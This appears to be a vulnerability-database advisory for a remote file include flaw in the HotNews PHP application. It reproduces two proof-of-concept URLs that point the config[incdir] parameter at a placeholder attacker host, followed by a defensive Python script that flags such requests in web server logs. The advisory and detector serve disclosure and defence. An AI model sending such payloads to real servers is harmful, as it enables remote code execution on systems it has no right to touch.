Vendor: HotNews
By: SecurityFocus
CVSS: 7.5 (HIGH)
Multiple File Include
CWE: 98
Product Name: HotNews
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2002-1390
CPE: o:hotnews:hotnews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

HotNews Multiple File Include Vulnerability

HotNews is prone to multiple file include vulnerabilities, which allow remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.

Mitigation:

Upgrade to the latest version of HotNews.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9357/info
 
HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.

http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3
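
For defenders reviewing web server logs, the request pattern above can be matched as follows. This is an added example, not part of the original advisory or of HotNews; it assumes Common/Combined Log Format, and the log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request line of a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# URL schemes that make an include path point at another host.
REMOTE_SCHEME_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)


def find_remote_include_attempts(log_lines, param="config[incdir]"):
    """Return (line_no, path, value) for each request whose `param` is a remote URL."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group("target").partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl percent-decodes once; decode again to catch double encoding.
            name, value = unquote(name), unquote(value)
            if name == param and REMOTE_SCHEME_RE.match(value):
                hits.append((line_no, path, value))
    return hits


# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '198.51.100.23 - - [05/Jan/2004:10:12:01 +0000] '
    '"GET /index.php3 HTTP/1.0" 200 5120',
    '198.51.100.23 - - [05/Jan/2004:10:12:09 +0000] '
    '"GET /includes/hnmain.inc.php3?config[incdir]=http://remote.example/ HTTP/1.0" 200 312',
    '198.51.100.40 - - [05/Jan/2004:10:13:44 +0000] '
    '"GET /includes/hnmain.inc.php3?config%5Bincdir%5D=http%3A%2F%2Fremote.example%2F'
    ' HTTP/1.1" 200 312',
    '198.51.100.51 - - [05/Jan/2004:10:15:02 +0000] '
    '"GET /includes/hnmain.inc.php3?config[incdir]=includes/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line_no, path, value in find_remote_include_attempts(SAMPLE_LOG):
        print(f"line {line_no}: {path} config[incdir] -> {value}")
```

The function flags both the literal and the percent-encoded form of the parameter and ignores requests where the parameter holds a local path.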